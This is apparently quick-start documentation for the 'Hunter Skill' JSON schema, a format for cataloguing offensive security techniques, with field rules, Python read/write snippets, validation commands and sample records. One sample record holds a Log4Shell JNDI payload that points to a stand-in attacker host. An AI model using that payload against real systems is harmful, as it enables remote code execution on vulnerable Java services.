The Hunter Skill standard format is a JSON schema for organizing cybersecurity knowledge and techniques.
- ✅ Schema defined: SKILL_SCHEMA.json
- ✅ Documentation complete: SKILL_STANDARD.md
- ✅ Tools created: validation & migration scripts
- 🔄 Migration in progress
{
"version": "1.0.0",
"metadata": {
"id": "log4shell-cve-2021-44228",
"schema_version": "1.0.0",
"created_at": "2025-01-15T10:00:00Z",
"updated_at": "2025-02-06T14:30:00Z",
"status": "active"
},
"classification": {
"category": "CVE Exploits",
"subcategory": "Java Vulnerabilities",
"tags": ["log4j", "rce", "critical"],
"difficulty": "intermediate",
"attack_type": ["exploitation"],
"cves": ["CVE-2021-44228"]
},
"content": {
"title": "Log4Shell RCE",
"summary": "Apache Log4j JNDI injection...",
"description": "Full description here...",
"payloads": ["Line 1", "Line 2", "..."]
},
"context": {
"source": "PayloadsAllTheThings",
"references": [
{
"title": "POC Repository",
"url": "https://github.com/example/poc",
"type": "github"
}
],
"author": "Security Team",
"license": "MIT"
}
}id: Unique identifier (semantic, not hash)created_at/updated_at: ISO 8601 timestampsstatus: active | deprecated | retired | draftschema_version: For migration tracking
category: Primary category (required)subcategory: Optional deeper leveltags: Searchable keywords (optional)difficulty: beginner | intermediate | advancedattack_type: Type of attack/techniquecves: Related CVE identifiers
title: Skill namesummary: One-line descriptiondescription: Full descriptionpayloads: Array of content lines
source: Where it came fromreferences: Links to original/related materialsauthor: Who created itlicense: License information
Account Takeover
API Key Leaks
CVE Exploits
DNS Rebinding
Encoding Transformations
File Inclusion
Insecure Deserialization
LDAP Injection
Methodology and Resources
Learning and Socials
[Custom categories]
- Beginner: Basic concepts, entry-level
- Intermediate: Some knowledge required, nuanced techniques
- Advanced: Expert-level, sophisticated exploitation
reconnaissance- Information gatheringexploitation- Vulnerability exploitationpost-exploitation- Post-compromise activitiesevasion- Evading security controlssocial-engineering- Human-focused attacks
import json
with open('skills/skill_file.json') as f:
skill = json.load(f)
# Access fields
skill_id = skill['metadata']['id']
title = skill['content']['title']
category = skill['classification']['category']
tags = skill['classification'].get('tags', [])
difficulty = skill['classification'].get('difficulty')
# Reconstruct content from payloads
content = '\n'.join(skill['content']['payloads'])import json
from datetime import datetime
new_skill = {
"version": "1.0.0",
"metadata": {
"id": "my-new-skill",
"schema_version": "1.0.0",
"created_at": datetime.utcnow().isoformat() + "Z",
"updated_at": datetime.utcnow().isoformat() + "Z",
"status": "active"
},
"classification": {
"category": "Your Category",
"tags": ["tag1", "tag2"],
"difficulty": "intermediate"
},
"content": {
"title": "Your Skill Title",
"summary": "Brief summary",
"description": "Full description",
"payloads": ["Content line 1", "Content line 2"]
},
"context": {
"source": "Your Source",
"references": [
{
"title": "Reference Title",
"url": "https://...",
"type": "github"
}
]
}
}
# Save skill
with open('skills/new_skill.json', 'w') as f:
json.dump(new_skill, f, indent=2)# Validate single file
python3 scripts/validate_skills.py skills/your_skill.json
# Validate directory
python3 scripts/validate_skills.py skills/
# Generate report
python3 scripts/validate_skills.py skills/ --report report.jsonmetadata.idmetadata.schema_versionmetadata.created_atmetadata.updated_atmetadata.statusclassification.categorycontent.titlecontent.payloadscontext.source
classification.tagsclassification.difficultycontent.summarycontent.descriptioncontext.author
classification.subcategoryclassification.attack_typeclassification.cvescontext.referencescontext.license
IDs should be:
- Semantic:
log4shell-cve-2021-44228(notcategory-abc123) - Lowercase: Only lowercase letters, numbers, hyphens
- Meaningful: Describe the skill content
- Unique: No duplicates across all files
mfa-bypasslog4shell-cve-2021-44228sql-injection-blindwindows-privilege-escalationdocker-escape
Use searchable keywords relevant to the skill.
log4j- Technology namerce- Attack resultauthentication- Categoryjava- Programming languageweb- Domain
- Lowercase only
- Use hyphens for multi-word tags
- Max 20 tags per skill
- Avoid duplicates
Type Description
---- -----------
github GitHub repository
blog Blog post/article
documentation Official docs
tool Tool/script
pdf PDF document
video Video content
academic Research paper
other Miscellaneous
Always use ISO 8601 format with UTC timezone:
Format: YYYY-MM-DDTHH:MM:SSZ
Example: 2025-02-06T14:30:00Z
{
"version": "1.0.0",
"metadata": {
"id": "log4shell-cve-2021-44228",
"schema_version": "1.0.0",
"created_at": "2025-01-15T10:00:00Z",
"updated_at": "2025-02-06T14:30:00Z",
"status": "active"
},
"classification": {
"category": "CVE Exploits",
"subcategory": "Java Vulnerabilities",
"tags": ["log4j", "rce", "critical", "java"],
"difficulty": "intermediate",
"attack_type": ["exploitation"],
"cves": ["CVE-2021-44228", "CVE-2021-45046"]
},
"content": {
"title": "Log4Shell RCE",
"summary": "Apache Log4j JNDI injection allowing remote code execution",
"description": "Apache Log4j2 <=2.14.1 contains a critical vulnerability...",
"payloads": ["${jndi:ldap://attacker.com/a}", "..."]
},
"context": {
"source": "PayloadsAllTheThings",
"references": [
{
"title": "Log4Shell POC",
"url": "https://github.com/projectdiscovery/nuclei-templates",
"type": "github"
}
],
"author": "Security Researchers",
"license": "MIT"
}
}{
"version": "1.0.0",
"metadata": {
"id": "python-security-resources",
"schema_version": "1.0.0",
"created_at": "2025-01-20T10:00:00Z",
"updated_at": "2025-02-06T14:30:00Z",
"status": "active"
},
"classification": {
"category": "Learning and Socials",
"tags": ["python", "programming", "resources", "learning"],
"difficulty": "beginner"
},
"content": {
"title": "Python Security Resources",
"summary": "Curated Python resources for cybersecurity",
"description": "A collection of Python libraries, tools, and resources...",
"payloads": ["# Resources", "- Resource 1", "- Resource 2", "..."]
},
"context": {
"source": "h4cker",
"references": [
{
"title": "Awesome Python",
"url": "https://github.com/vinta/awesome-python",
"type": "github"
}
]
}
}| Directory | Files | Status |
|---|---|---|
| skills/ | 100+ | Ready for migration |
| skills/ | 50+ | Ready for migration |
| skills/ | 100+ | Ready for migration |
❌ Wrong: "id": "account_takeover-abc123"
✅ Right: "id": "mfa-bypass"
❌ Wrong: "created_at": "2025-02-06" (missing time)
✅ Right: "created_at": "2025-02-06T14:30:00Z"
❌ Wrong: "category": "account takeover" (lowercase)
✅ Right: "category": "Account Takeover" (title case)
❌ Wrong: "payloads": "string content"
✅ Right: "payloads": ["line 1", "line 2"]
❌ Wrong: "references": ["https://link1", "https://link2"]
✅ Right: "references": [{"title": "...", "url": "...", "type": "..."}]
- Full Standard: SKILL_STANDARD.md
- JSON Schema: SKILL_SCHEMA.json
- Migration Guide: MIGRATION_GUIDE.md
- Implementation Roadmap: IMPLEMENTATION_ROADMAP.md
- Validation Tool:
python3 scripts/validate_skills.py - Migration Tool:
python3 scripts/migrate_skills.py
python3 scripts/validate_skills.py your_file.json# Look at example file
cat skills/account_takeover-8be4bd2d2663.json | jq '.'python3 scripts/migrate_skills.py your_file.json --dry-runQuick Start Version: 1.0.0
Last Updated: 2025-02-06